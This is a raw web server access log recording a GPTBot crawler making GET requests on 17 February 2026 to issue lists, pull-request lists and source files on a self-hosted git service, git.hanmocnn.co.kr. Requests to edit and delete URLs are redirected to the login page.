74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13509] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:18:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2f__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 20826] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:18:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11251] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" -[17/Feb/2026:18:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15573] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:18:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13782] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:18:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12996] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:18:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13801] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 